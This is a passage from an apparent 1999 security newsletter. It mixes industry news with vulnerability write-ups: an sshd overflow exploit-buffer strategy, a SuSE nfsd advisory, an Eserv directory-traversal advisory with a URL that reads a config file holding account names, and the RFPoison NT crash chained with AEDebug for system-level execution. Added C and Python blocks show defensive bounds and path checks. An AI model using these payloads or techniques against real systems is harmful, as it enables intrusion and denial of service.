      key has to be taken as the exploit buffer. I.e. the shellcode, NOPs
      and jump address have to be sent to the server instead of the encrypted
      session key. To make that clear: The shellcode, NOPs and jump address
      don't have to be encrypted as they are taken as the ENCRYPTED session
      key.
      
      However, the data that is finally written into the buffer are the
      limbs of the multiple precision integer that session_key_int is
      assumed to be. The exploit buffer code therefore must be converted
      into a multiple precision integer, which upon extraction of the limbs
      into the buffer yields the correct exploit buffer code. The best way
      would probably be to start from the exploit buffer as it should finally
      be to overflow the target buffer and use the functions of the GNU
      multiple precision integer library to reverse the procedure happening
      to the encrypted session key in the sshd code step by step, leading to
      the exploit buffer that has to be sent instead of the encrypted session
      key.
      
      That may be difficult, but I think it's possible.
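
      The missing length check from the analysis above, as an added example
      (not part of the original post and not the ssh patch itself): the length
      derived from the peer-supplied integer is compared with the destination
      size before any byte is converted. The toy_mpint type, the helper names
      and the value 128 for MAX_RSA_MODULUS_LEN are assumptions, chosen so the
      block builds without GMP or RSAREF.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed for illustration: buffers sized for a 1024-bit RSA modulus. */
#define MAX_RSA_MODULUS_LEN 128

/* Constructed stand-in for GMP's MP_INT: 32-bit limbs, least significant first. */
typedef struct {
    const uint32_t *limbs;
    size_t nlimbs;
} toy_mpint;

/* Significant bits in the value, like mpz_sizeinbase(x, 2); 1 for zero. */
static unsigned int toy_sizeinbase2(const toy_mpint *x)
{
    size_t n = x->nlimbs;
    unsigned int bits = 0;
    uint32_t top;
    while (n > 0 && x->limbs[n - 1] == 0)
        n--;
    if (n == 0)
        return 1;
    for (top = x->limbs[n - 1]; top != 0; top >>= 1)
        bits++;
    return (unsigned int)((n - 1) * 32) + bits;
}

/* Byte k of the value, k = 0 being the least significant byte. */
static unsigned char toy_byte(const toy_mpint *x, size_t k)
{
    if (k / 4 >= x->nlimbs)
        return 0;
    return (unsigned char)(x->limbs[k / 4] >> (8 * (k % 4)));
}

/* Bounded form of mp_linearize_msb_first(): same big-endian output, but an
 * oversized len is refused before any byte is written to buf. */
int linearize_msb_first_checked(unsigned char *buf, size_t buf_size,
                                size_t len, const toy_mpint *value)
{
    size_t i;
    if (len > buf_size)
        return -1;
    for (i = 0; i < len; i++)
        buf[len - 1 - i] = toy_byte(value, i);
    return 0;
}

/* Models the start of rsa_private_decrypt(): derive input_len from the
 * peer-supplied integer and reject it when it exceeds the fixed buffer. */
int checked_input_to_rsaref(unsigned char *input_data, size_t *input_len,
                            const toy_mpint *input)
{
    unsigned int input_bits = toy_sizeinbase2(input);
    size_t len = (input_bits + 7) / 8;
    if (linearize_msb_first_checked(input_data, MAX_RSA_MODULUS_LEN, len, input) != 0)
        return -1;
    *input_len = len;
    return 0;
}

/* Constructed input: a 2048-bit value (256 bytes) is refused, buffer untouched. */
int demo_oversized_rejected(void)
{
    uint32_t limbs[64];
    unsigned char region[MAX_RSA_MODULUS_LEN + 16];
    toy_mpint big = { limbs, 64 };
    size_t len = 0, i;
    for (i = 0; i < 64; i++)
        limbs[i] = 0xFFFFFFFFu;
    memset(region, 0xAA, sizeof region);
    if (checked_input_to_rsaref(region, &len, &big) != -1)
        return 0;
    for (i = 0; i < sizeof region; i++)
        if (region[i] != 0xAA)
            return 0;
    return 1;
}

/* Constructed input: a 43-bit value converts to six big-endian bytes. */
int demo_in_range_accepted(void)
{
    static const uint32_t limbs[2] = { 0x04030201u, 0x00000605u };
    static const unsigned char want[6] = { 6, 5, 4, 3, 2, 1 };
    unsigned char input_data[MAX_RSA_MODULUS_LEN];
    toy_mpint val = { limbs, 2 };
    size_t len = 0;
    if (checked_input_to_rsaref(input_data, &len, &val) != 0)
        return 0;
    return len == 6 && memcmp(input_data, want, 6) == 0;
}

int main(void)
{
    return (demo_oversized_rejected() && demo_in_range_accepted()) ? 0 : 1;
}
```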
      
      @HWA
      

57.0  TORVALDS: COUPLE OF QUESTIONS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Thursday 18th November 1999 on 2:59 pm CET
      No one knows more about the Linux operating system than its
      creator, Linus Torvalds, and the founder of the largest Linux
      company, Bob Young of Red Hat. Michael Martinez tracked them
      down at Comdex and asked them a few questions.
      Link: ABC
      
      http://abcnews.go.com/sections/tech/DailyNews/comdexqa991116.html
      
      Linux Q&A
      Linus Torvalds and Bob Young Answer Your Questions 
 
 
      By Michael Martinez
      ABCNEWS.com
      L A S   V E G A S -- No one knows more about
      the Linux operating system than its creator,
      Linus Torvalds, and the founder of the largest
      Linux company, Bob Young of Red Hat. So I
      tracked them down at Comdex and asked them
      to answer your questions for you. 
 
 
 
      Q U E S T I O N:  How are you planning to prevent the
      "Big Guys" (IBM, Hewlett-Packard, Compaq/DEC, Sun)
      from adding their own features to Linux and causing
      incompatibilities among different vendors' products?
                               -- Doug MacDonald

      A N S W E R:   "I really don't think there's a problem
      there," says Linux creator Torvalds. "A lot of these
      so-called big guys in particular have been burned by
      operating systems in the past. Just look at what happened to
      (IBM's) OS/2. Nobody wants to touch operating
      systems. Everybody is so damned happy that somebody
      else is doing it!
           "Everyone that I've worked with has been very open
      with what they are doing with regard to Linux," Torvalds
      says. "They aren't really even trying to be very aggressive
      with the kernel [the core of the OS which Torvalds
      oversees, which is essentially the same in all forms of
      Linux]. The kernel is kind of scary to mess around with,
      and there just aren't many developers willing to do it.
      We've seen Linux users grow from 1,000 to 10 million,
      but the number of people working on the kernel has
      grown from maybe 100 to 200.
           "And remember, the license prevents them from going
      too far. Everything they do has to be open source. Any
      competitor can then come along and grab that code and
      add it to their version of the system."
 
 
 
      Q U E S T I O N:  Linux seems well-suited for server use,
      where knowledge of the system is necessary to get the
      best out of it. But the newest influx of users, including
      myself, wants a new option for the desktop. So far, my
      experiences have been very disappointing. What can be
      done to move to a mainstream desktop platform that
      takes the guesswork out of installing an application?
                                    -- Rick Tillery

      A N S W E R:   "Your reader is obviously right because,
      fundamentally, nobody actually buys operating systems,"
      Red Hat founder Bob Young says. "People choose the
      applications they need, then choose the operating system.
      Microsoft clearly owns the desktop, because if you go to
      CompUSA, all the shelves have software for Windows.
           "We are very actively focused on this problem, and we
      are very happy with what folks like Corel are doing,
      bringing over their office (software) suite, with what Sun
      Microsystems has done with Star Office, with what
      Applixware is doing with their suite. We're happy with
      what Netscape/AOL has been doing with the browser,
      because the browser was the killer desktop application in
      the 1990s."
           Red Hat, the leading Linux seller, announced Monday
      that it will acquire software company Cygnus Solutions for
      $674 million. Young says this deal will also help.
           "Cygnus makes the kind of tools that developers need
      to create the applications people want," Young says.
      "This could go a long way to help provide this total
      solution that people need to do the kind of things they
      really want to on the desktop."
     
     @HWA
      
58.0  Y2K PREPARATIONS CAUSED PROBLEMS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      
      by BHZ Wednesday 17th November 1999 on 6:00 pm CET
      Y2K problems are starting before the actual rollover. Attempts by
      the City of Montreal to stave off a Y2K computer disaster are being
      blamed for causing the blaze that gutted a fire station.
      Link: Canoe
      
      http://www.canoe.ca/EdmontonNews/es.es-11-17-0047.html
      (Bleh! - 404: url not found)
      
      @HWA
      
59.0  IS MICROSOFT TO BLAME FOR Y2K?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Wednesday 17th November 1999 on 6:12 pm CET
      David O'Daniel Eddy wrote his opinion on Microsoft, with the actual
      quote that Microsoft could be called responsible for the Y2K
      problem. Do read his article entitled "A Knuckleball for Microsoft".
      Link: Westergaard      
      
      http://www.wbn.com/y2ktimebomb/Techcorner/DE/de9946.htm
      
      A Knuckleball for Microsoft

       © 1999 By David O'Daniel Eddy
       November 17, 1999

       Now that we have something really serious -- the Justice Department's
       ruling that Microsoft is a predatory monopoly -- to distract us, provide
       a wonderful amorphous target for endless editorial speculation, and
       generally contribute to landfills, I'd better get my two cents on the
       table.

       A year ago I expressed my reservations about how Microsoft's plunging
       ahead with Windows 2000 was an indication of their not paying serious
       attention to Y2K issues on the desktop.

       Although I recognize that Microsoft has indeed done tremendous good
       for the PC industry, they are at the same time far too full of their own
       power and success. They're so powerful now that they are effectively a
       captive of their own PR spin. If Chairman Bill says Y2K is primarily an
       old mainframe issue, then that's the way it is. End of discussion.

       But reality says something different.

       Let me share one of my favorite little factoids. My local business library
       has a directory of desktop (Windows, Unix, Macintosh, Commodore,
       Amiga, Tandy, etc.) software. It lists 3,056 vendors and 21,000
       products. The majority of these commercial software products are what
       I would broadly classify as accounting packages -- accounts receivable,
       accounts payable, inventory management, general ledger, etc. The stuff
       that runs businesses.

       I don't care how you slice this, that's a lot of software. And we haven't
       even looked at the issue of how many different releases or versions of
       a product are available. Just because a vendor is at v10 of their
       product is not to say that all v1 versions have been retired in their
       customer base.

       Then I factor in knowledge from the outside world and my Y2K travels.
       The directory really tracks software packages offered only for broad
       market sale. It does not include the "package" written by a local CPA
       firm and installed (in a variety of configurations!) at 25 local client sites.
       The directory obviously doesn't include products that are no longer sold.
       It doesn't include the entirely custom software that has been written in
       the dozens of PC database/language products such as dBase II,
       dBase III, dBase IV, FoxPro, Paradox, 4D, Revelation, Alpha Four,
       FileMaker, and Clipper.

       In our fascination with the spectacular rise of Microsoft's market
       success we seem to forget that they make only software tools. They do
       not make core business accounting packages. They do not make
       business applications. That market is serviced by products from the
       likes of PeachTree, Great Plains Software, and thousands of other
       vendors. There are no dominant players here. In the world of desktop
       accounting packages, to have $50 million in revenues is to be large.

       The point I'm trying to drive home here is that our perceptions are
       upside down. Microsoft makes the base layer of operating system
       software and some of the specialized tools (database engines and
       language compilers) from which business applications are constructed.
       It's the teeny tiny (by comparison to the Microsoft behemoth) accounting
       package vendors like Great Plains Software ($85 million 1998
       revenues) that use Microsoft hammers to build houses that people
       actually live in.

       As powerful, useful, and ubiquitous as MS Word and Excel have
       become, we have to remember that these are only the equivalent of a
       hammer or screwdriver. As universal as these products have become,
       it is simply not possible to run a business of any size or complexity with
       just a word processor and spreadsheet. To be a business, you need a
       chart of accounts, a general ledger, double entry bookkeeping,
       inventory control and much, much more.

       We've become so dazzled by Microsoft's ability to tell us it's time once
       again to upgrade to a more powerful operating system that we've lost
       sight of the fact that there are still tens of thousands of business
       applications in active use in both large and small enterprises, which are
       still running MS-DOS v5 on a 286 PC. There are huge segments of the
       marketplace that simply don't pay attention to the endless upgrade
       treadmill foisted on us by Microsoft and the media.

       And because Microsoft took an early hard line on Y2K -- "that's a
       mainframe problem" -- from the beginning, large numbers of people,
       assuming that a smart, super rich guy like Bill Gates knows what he's
       talking about, have simply gone back to sleep about the Y2K risks
       lurking inside their business operations.

       The tide of public opinion, represented in one aspect by the court's
       monopoly ruling, is beginning to shift against Microsoft. When core
       business applications running on defined-as-obsolete software (e.g.,
       running on MS-DOS or Windows 3.1) go belly up in the new year,
       there are going to be a lot of very angry folks. These are business
       people who are not at all interested in an esoteric technical discussion
       about the differences between operating system tools and business
       applications. After all, the cynics said all along that Y2K was just a
       scam and that Gates & Co. would ride in at the last moment with a
       $49.95 fix-it special. 

       The evidence is that many small businesses do not perceive
       themselves to be at risk and are planning to cope with Y2K in a
       "fix-on-failure" mode.

       I believe that the building resentment against Microsoft's abusive
       tactics and undisputed monopoly powers will take an additional swing
       into negative territory come the new year, when core PC applications
       start going flakey.

       It certainly doesn't make sense to hold the tool builder responsible for
       the fact that your house collapsed, but the tool builder -- Microsoft in this
       instance -- has set themselves up for a mighty fall by turning a largely
       deaf ear to desktop Y2K risks. 
       
       @HWA
       
60.0  $50 MILLIONS FOR Y2K CENTER
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ Wednesday 17th November 1999 on 4:57 pm CET
      The government offered the first public glimpse Monday of its new
      $50 million Y2K nerve center, a highly computerized crisis room
      near the White House designed to track failures worldwide caused
      by the Year 2000 technology problem.
      Link: SJ Mercury
      
      http://www.sjmercury.com/svtech/news/breaking/merc/docs/081106.htm
      
      Government opens $50 million Y2K crisis center

      WASHINGTON (AP) -- The government offered the first public glimpse Monday 
      of its new $50 million Y2K nerve center, a highly computerized crisis room 
      near the White House designed to track failures worldwide caused by the 
      Year 2000 technology problem.

      President Clinton's top Y2K adviser, John Koskinen, said the 
      administration continues to believe there will be no major national 
      problems, but said its Information Coordination Center will watch for 
      ``some glitches'' anticipated during the New Year's date rollover.

      ``We hope that night will be really boring,'' said Koskinen, standing 
      before a glass-empaneled room filled with high-end computers and digital 
      maps showing global time zones. He called it ``the one place in the world 
      with the most complete information.''

      The government Monday also began cautioning against panic as people 
      discover problems during the New Year's weekend, since some non-Y2K 
      computer failures might simply coincide with the date rollover.

      ``We'll have failures from time to time whether you have a century date 
      change or not,'' said Skip Patterson, who runs the Year 2000 program for 
      Bell Atlantic Corp. Experts have previously warned of widespread phone 
      outages if everyone tried to make a call around midnight -- what Koskinen 
      described as ``Mother's Day by multiples.''

      Nationwide almost every day, for example, some Internet sites crash, 
      electricity temporarily fails or airline flights are delayed. In the 
      earliest hours of Jan. 1, no one may know whether problems were caused by 
      the Y2K bug or something else.

      ``The presumption is to blame all failures on Y2K that weekend,'' Koskinen 
      said.

      About 10 percent of all credit transactions fail routinely because, for 
      example, equipment breaks down or because consumers are overextended or 
      forget their ATM password, said Paul Schmelzer, an executive vice 
      president for Orlando, Fla.-based Star Systems Inc., which processes about 2 
      billion financial transactions annually.

      He expects those same problems to show up Jan. 1.

      ``What consumers need to do if they go to an ATM on New Year's Day and 
      find for whatever reason they can't get service, they should do what they 
      do today -- go find a machine down the block or get cash back in the 
      grocery store,'' Schmelzer said. ``Let's don't immediately assume we've 
      got some serious Y2K problems.''

      The government's Y2K crisis center is hardly a bunker -- it's on the 10th 
      floor of a downtown building just blocks from the White House -- but it 
      includes backup communications systems and entrance guards.

      Reports of any problems -- rated ``minor'' or ``significant'' -- will be 
      shared with the White House and top government officials who will decide 
      what to do. Information overseas will be fed by the State and Defense 
      departments and industry groups, starting at roughly 6 a.m. EST Dec. 31, 
      when midnight falls worldwide first in New Zealand.

      A flurry of activity is expected as midnight arrives across U.S. time 
      zones, with more attention starting midday EST Jan. 2 as employees 
      worldwide begin returning to their offices -- and turning on their 
      computers -- for the first time since the date change.

      Koskinen predicted that any hacker attacks could be more easily detected 
      during the date rollover because computers will be so closely monitored.

      A hacker calling himself ``Comdext0r'' vandalized a Web site at the 
      Commerce Department late Sunday, warning people to ``run for your lives!'' 
      and to ``hit your computer's power button and never, ever turn it on 
      again'' because of the Y2K bug.

      A spokesman for the National Telecommunications and Information 
      Administration, the government agency that handles high-tech policies, 
      said its Internet site was altered about 9 p.m. Sunday but repaired about 
      one hour later.

      Koskinen noted that recreational hackers typically vandalize Web sites to 
      demonstrate some vulnerability that a computer administrator failed to 
      fix. He said he was hopeful hackers wouldn't try such demonstrations 
      during the weekend date change.

       ``We think they will understand this is not the best time to do that,'' 
       Koskinen said.
       
       @HWA
       
61.0  EYES ON EXEC 2.32
      ~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ Wednesday 17th November 1999 on 4:44 pm CET
      Eyes on Exec 2.32 is a set of tools which you can use to build your
      own host based IDS. It watches for programs getting exec'd and
      logs information about it to a file. Combined with perl this can be
      extremely powerful. Requires linux kernel 2.2.
      Link: Packet Storm       
      
      http://packetstorm.securify.com/UNIX/IDS/eoe232.tar.gz
      
      @HWA
      
62.0  CHECKPOINT AND LINUX
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
       
      by BHZ Wednesday 17th November 1999 on 4:37 pm CET
      Check Point Software Technologies has created versions of its
      virtual private networks (VPN) and its security solution for the Linux
      platform to help Linux users keep prying eyes on the Internet at bay.
      Link: Checkpoint
      
      http://www.checkpoint.com
      
      @HWA
      
63.0  NOVELL SIMPLIFIES THINGS
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ Wednesday 17th November 1999 on 4:33 pm CET
      Novell's chief executive Eric Schmidt yesterday announced an
      update to Novell's directory software that's intended to simplify the
      Web experience. A directory serves as a central repository for
      information concerning users, systems and network devices.
      Link: CNET
      
      http://news.cnet.com/news/0-1003-200-1451504.html?dtn.head
      
      Novell update intended to simplify Web logins, networks 
      By Wylie Wong
      Staff Writer, CNET News.com
      November 16, 1999, 9:15 p.m. PT 

      LAS VEGAS--Novell aims to untangle the Web, according to chief 
      executive Eric Schmidt.

      Speaking at a trade show here, Schmidt today announced an update to 
      Novell's directory software that's intended to simplify the Web 
      experience. A directory serves as a central repository for information 
      concerning users, systems and network devices.

      The constant pitfalls of surfing are all too familiar, Schmidt said. 
      Consumers face the hassle of trying to remember login names and passwords, 
      while businesses find it difficult to link their employees, suppliers and 
      partners together and manage those relationships. Novell hopes networks 
      will adopt its technology with the goal of making it easier to store and 
      retrieve that information.

      Novell, once struggling in the shadow of Microsoft, is attempting to make 
      a comeback with its directory software technology as a strategic 
      centerpiece. The company believes its directory can become a central 
      information database for software developers to rely on.

      Schmidt demonstrated how the technology works during his speech: With the 
      update, the company's previously announced DigitalMe service allows Web 
      portals, e-commerce firms and Internet service providers to let consumers 
      control how their personal information is shared, used and maintained on 
      the Net via a link to Novell's directory, or NDS.

      "It's the holy grail that the networking CIO [chief information officer] 
      is trying to achieve," Schmidt said.

      In addition to the Internet-based directory update, called eDirectory, 
      Novell released its NDS corporate edition for managing user information. 
      The company also announced Net Publisher, which helps businesses manage 
      the publication of content over the Web.

      The eDirectory--based on previously released NDS version 8 
      technology--supports the NetWare, Microsoft Windows NT and Sun 
      Microsystems Solaris operating systems. In the future, the directory also 
      will support Linux, Compaq Tru64 and Windows 2000, the company said.

      The release of eDirectory will lead to several product introductions over 
      the next several months, according to Schmidt.

      Novell further announced two dozen partnerships, including AltaVista, 
      BroadVision, Sun Microsystems, PeopleSoft and Oblix, which are either 
      using the technology in their businesses or building the technology into 
      their products. Novell wants to encourage corporations to rely on its 
      directory, so that businesses come to use its central administrative 
      database regardless of the operating system they are using.

      "It's key to manage the information of users, to authenticate users on 
      what kinds of information they have access to, and to provide single 
      administration," said Eric Golin, chief technology officer of Broadvision, 
      during a press conference today.

      Novell executives are launching several promotions to market eDirectory. 
      Independent software vendors can download a 100-user version of eDirectory 
      and bundle it in their own applications. 
      
      @HWA
      
64.0  RPC.NFSD PROBLEMS
      ~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Wednesday 17th November 1999 on 4:27 pm CET
      The rpc.nfsd which is part of the nfs-server package was found to
      have two remote vulnerabilities.
      Link: Packet Storm      
      
      http://packetstorm.securify.com/advisories/suse/suse.nfs.txt
      
      -----BEGIN PGP SIGNED MESSAGE-----
      
      ______________________________________________________________________________
      
                              SuSE Security Announcement
      
              Package: nfs-server < 2.2beta47 within nkita
              Date:    Fri, 12 Nov 1999 02:12:50 GMT
      
              Affected SuSE versions: all
              Vulnerability Type:     remote root compromise
              SuSE default package:   yes (not activated by default)
              Other affected systems: all linux systems using the nfs-server
      ______________________________________________________________________________
      
      A security hole was discovered in the package mentioned above.
      Please update as soon as possible or disable the service if you are using
      this software on your SuSE Linux installation(s).
      
      Other Linux distributions or operating systems might be affected as
      well, please contact your vendor for information about this issue.
      
      Please note that we provide this information on "as-is" basis only.
      There is no warranty whatsoever and no liability for any direct, indirect or
      incidental damage arising from this information or the installation of
      the update package.
      _____________________________________________________________________________
      
      1. Problem Description
      
        The rpc.nfsd which is part of the nfs-server package was found to have
        two remote vulnerabilities.
      
      2. Impact
      
        Via a buffer overflow, remote root access can be achieved. Write access to
        the local filesystem which is exported is necessary.
        Another security problem is improper root_squash export handling.
      
      3. Solution
      
        Update the package from our FTP server.
      ______________________________________________________________________________
      
      Please verify these md5 checksums of the updates before installing:
      
      f03592bc738b6fa5cfa2f3a21250125a  ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/nkita-99.11.11-0.alpha.rpm
      c4fd6ad2029165a14e26140c56c64a06  ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/nkita-99.11.11-0.i386.rpm
      75c7b4aa20d13f4b81428013690fbf3f  ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/nkita-99.11.11-0.i386.rpm
      ______________________________________________________________________________
      
      You can find updates on our ftp-Server:
      
        ftp://ftp.suse.com/pub/suse/i386/update for Intel processors
        ftp://ftp.suse.com/pub/suse/axp/update  for Alpha processors
      
      or try the following web pages for a list of mirrors:
        http://www.suse.de/ftp.html
        http://www.suse.com/ftp_new.html
      
      Our webpage for patches:
        http://www.suse.de/patches/index.html
      
      Our webpage for security announcements:
        http://www.suse.de/security
      
      If you want to report vulnerabilities, please contact
        security@suse.de
      ______________________________________________________________________________
      
      SuSE has got two free security mailing list services to which any
      interested party may subscribe:
      
      suse-security@suse.com          - moderated and for general/linux/SuSE
                                        security discussions. All SuSE security
                                        announcements are sent to this list.
      
      suse-security-announce@suse.com - SuSE's announce-only mailing list.
                                        Only SuSE's security announcements are sent
                                        to this list.
      
      To subscribe to the list, send a message to:
           <suse-security-subscribe@suse.com>
      
      To remove your address from the list, send a message to:
           <suse-security-unsubscribe@suse.com>
      
      Send mail to the following for info and FAQ for this list:
           <suse-security-info@suse.com>
           <suse-security-faq@suse.com>
      
      _____________________________________________________________________________
      
        This information is provided freely to everyone interested and may
        be redistributed provided that it is not altered in any way.
      
      Type Bits/KeyID    Date       User ID
      pub  2048/3D25D3D9 1999/03/06 SuSE Security Team <security@suse.de>
      
      
      
      @HWA

65.0  Eserv 2.50 Web interface Server Directory Traversal Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://packetstorm.securify.com/

      From: "Ussr Labs" <labs@ussrback.com>
      To: "TECHNOTRONIC" <news@technotronic.com>
      Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability
      Date: Thu, 4 Nov 1999 21:20:35 -0300
      
      Eserv 2.50 Web interface Server Directory Traversal Vulnerability
      
      Product:
      
      Eserv/2.50 is the complete solution to access Internet from LAN:
      
      - Mail Server (SMTP and POP3, with ability to share one mailbox
        on the ISP, aliases and mail routing support)
      - News Server (NNTP)
      - Web Server (with CGI, virtual hosts, virtual directory support,
        web-interface for all servers in the package)
      - FTP Server (with virtual directory support)
      - Proxy Servers
        * FTP proxy and HTTP caching proxy
        * FTP gate
        * HTTPS proxy
        * Socks5, Socks4 and 4a proxy
        * TCP and UDP port mapping
        * DNS proxy
      - Finger Server
      - Built-in scheduler and dialer (dial on demand,
        dialer server for extern agents, scheduler for any tasks)
      
      PROBLEM
      
      UssrLabs found an Eserv Web Server Directory Traversal Vulnerability.
      Using the string '../' in a URL, an attacker can gain read access to
      any file outside of the intended web-published filesystem directory.
      
      There is not much to expand on this one....
      
      Example:
      
      http://127.1:3128/../../../conf/Eserv.ini
      to show the entire configuration file, including account names
      
      
      Vendor Status:
      not contacted
      
      Vendor   Url: http://www.eserv.ru/
      Program Url: http://www.eserv.ru/eserv/
      
      Credit: USSRLABS
      
      SOLUTION
      
          Nothing yet.
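
      Added example, not part of the UssrLabs advisory and not Eserv code:
      the path check whose absence the advisory describes, next to the
      unsafe join. The directory layout, function names and sample requests
      are constructed for illustration.

```python
import os
import tempfile
from urllib.parse import unquote


class TraversalError(Exception):
    """The request would resolve outside the published directory."""


def resolve_naive(docroot, target):
    # Unsafe pattern: the request path is appended to the root as-is, so
    # every "../" climbs one directory above the published tree.
    path = target.split("?", 1)[0]
    return os.path.normpath(os.path.join(docroot, path.lstrip("/")))


def resolve_safe(docroot, target):
    # 1. Drop query/fragment, then percent-decode exactly once.
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    if "\x00" in path:
        raise TraversalError("NUL byte in path")
    # 2. Accept backslash as a separator too: on a Windows server both
    #    spellings reach the filesystem as directory separators.
    segments = [s for s in path.replace("\\", "/").split("/")
                if s not in ("", ".")]
    # 3. Refuse parent references outright rather than trying to strip them.
    if ".." in segments:
        raise TraversalError("parent-directory segment in path")
    # 4. Canonicalise (this follows symlinks) and confirm containment.
    root = os.path.realpath(docroot)
    full = os.path.realpath(os.path.join(root, *segments))
    try:
        inside = os.path.commonpath([root, full]) == root
    except ValueError:  # e.g. different drives on Windows
        inside = False
    if not inside:
        raise TraversalError("resolved path escapes the document root")
    return full


# Constructed sample requests. The second is the form shown in the advisory;
# the rest are inputs the same check has to classify correctly.
SAMPLE_REQUESTS = [
    "/index.html",
    "/../../../conf/Eserv.ini",
    "/%2e%2e/%2e%2e/%2e%2e/conf/Eserv.ini",
    "/..\\..\\..\\conf\\Eserv.ini",
    "/link/Eserv.ini",
]


def run_demo():
    """Build a constructed tree and classify each sample request."""
    with tempfile.TemporaryDirectory() as base:
        base = os.path.realpath(base)
        docroot = os.path.join(base, "site", "pub", "www")  # published
        conf = os.path.join(base, "conf")                    # private
        os.makedirs(docroot)
        os.makedirs(conf)
        secret = os.path.join(conf, "Eserv.ini")
        for name, text in ((secret, "[accounts]\n"),
                           (os.path.join(docroot, "index.html"), "hello\n")):
            with open(name, "w") as fh:
                fh.write(text)
        try:  # a symlink inside the root that points at the private directory
            os.symlink(conf, os.path.join(docroot, "link"))
        except OSError:
            pass  # no symlink rights: that request then ends as "not found"

        # Does the unsafe join hand back the private configuration file?
        naive_leaks = resolve_naive(docroot, SAMPLE_REQUESTS[1]) == secret

        results = {}
        for req in SAMPLE_REQUESTS:
            try:
                full = resolve_safe(docroot, req)
                results[req] = "served" if os.path.isfile(full) else "not found"
            except TraversalError:
                results[req] = "blocked"
        return naive_leaks, results


if __name__ == "__main__":
    leaks, outcome = run_demo()
    print("naive join reaches private file:", leaks)
    for request, verdict in outcome.items():
        print(f"{verdict:10} {request}")
```

      The containment test in step 4 is what catches the symlink case, which
      the segment filter in step 3 cannot see.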
      
      
      @HWA      
      
66.0  RFP9906 - RFPoison
      ~~~~~~~~~~~~~~~~~~ 

      
      From rfp@wiretrip.net Mon Nov  1 09:20:06 1999
      Date: Mon, 1 Nov 1999 08:18:50 -0600 (EST)
      From: ".rain.forest.puppy." <rfp@wiretrip.net>
      To: vacuum@technotronic.com, thegnome@nmrc.org
      Subject: RFP9906 - RFPoison
      
      
      
      --- Advisory RFP9906 ----------------------------- rfp.labs -----------
      
                   Windows NT remote denial of service and compromise
                                    (RFPoison)
      
      ------------------------------ rain forest puppy / rfp@wiretrip.net ---
      
      Table of contents:
              - 1. Problem
              - 2. Solution
              - 3. Where to Get This Weapon of Mass Destruction
              - 4. Miscellaneous Updates (Important stuff!)
      
      -----------------------------------------------------------------------
      
      My website has been launched!  Up to the minute advisories, tools, (and
      code fixes...heh) are available from http://www.wiretrip.net/rfp/
      
      -----------------------------------------------------------------------
      
      ----[ 1. Problem
      
              Interesting on how things go around/come around.  Recently Luke 
      Kenneth Casson Leighton posted a message on NTBugtraq in response to SP6
      not fixing the LSA denial of service.  He states that this problem is
      essentially "due to marshalling/unmarshalling MSRPC code being unable to
      cope with a NULL policy handle."  He also states that they reported this
      problem to Microsoft around February 1999.
      
              Well, no, I did not 'rediscover' the LSA denial of service (ala
      the AEDebug advisory earlier this month).  I did, however, discover a
      different denial of service based out of services.exe.  When sent a
      specific packet, it's possible to get srvsvc.dll to choke, and cause
      services.exe to reference a bad memory location.  For those geeks in the
      crowd, essentially srvsvc_netrshareenum in srvsvc.dll uses
      rpcrt4_ndrcomplexstructunmarshall to tweak a string, but returns a NULL.
      srvsvc_netrshareenum doesn't check for return value, adds four to the
      pointer, and passes it up a function stack until finally that memory is
      read (address 00000004).  Blam...Dr. Watson. 
      
              So we have another problem due to marshalling/unmarshalling MSRPC
      code.  This was found independently of Luke's info and the LSA
      vulnerability.
      
              The impact is pretty severe.  Services.exe handles named pipes for
      the system.  Once this crashes, everything named-pipe-based goes with it.
      This means logons, logouts, remote system access (registry, server
      functions, etc), local server management, IIS, file sharing, etc...all go
      down the tube.  However, the box will, for the most part, appear to
      function normally on the local side, until you do something involving a
      named pipe service.  The only fix is to reboot...however, the shutdown
      procedure waits for every (non-existent) service to respond to shutdown,
      and timeout.  On a typical box this could cause the full shutdown
      procedure to push over a half-hour; therefore, hard reset is most likely
      needed.  Also, once in a great while the bug will 'survive' during a
      reset.  It may take two reboots to get the system back in order.  Strange,
      yes.  How, I'm not sure.  But it's happened over a half dozen times across
      four separate boxes I've tested on.
      
              Now, I'm sure some of you are thinking "well, denial of services
      suck.  How can I own .gov and .mil websites with this?" (hi flipz and
      fuqrag)
      
              Well, let's go back to David LeBlanc's response to RFP9903
      (AEDebug advisory).  He states, for AEDebug to really be a problem, you
      have to "make something crash that has higher access rights than you do." 
      He also states "you've got to make a service go down that won't kill the
      machine."  
      
              Bingo, this fits the bill.  If we have access to change the
      AEDebug registry key, we can set what programs to run on crash, set
      autorun to True, and then crash services.exe.  Our programs run as
      Local_System, the box is still alive (TCP/IP-wise) and usable via netcat
      and whatnot.  A much more useful situation for a denial of service, don't
      you think?
      
              Also, Eric Schultze has detailed out many situations where someone
      could have access to your AEDebug key.  I suggest you read his tidbit.
      It's posted as document 11 in the knowledge base on my website, available
      at http://www.wiretrip.net/rfp/
      
              So far, I have been able to use this exploit on NT 4.0 server and
      workstation, with various levels of SP 1, 3, 5, and 6 service packs
      installed.  I even tried applying SP 5 with the following hotfixes (in the
      following order): lsareq, ipsrfix, csrssfx, ioctlfx, and igmpfix.  I've
      also tried using the Security Configuration Editor on various different
      'secure' system profiles, testing to see if perhaps a registry key
      affected it.  After all modifications, the systems were still susceptible.
      HOWEVER, I do have reports of two boxes *NOT* being susceptible.  The
      reason for this, however, is unfound.  Information will be released when
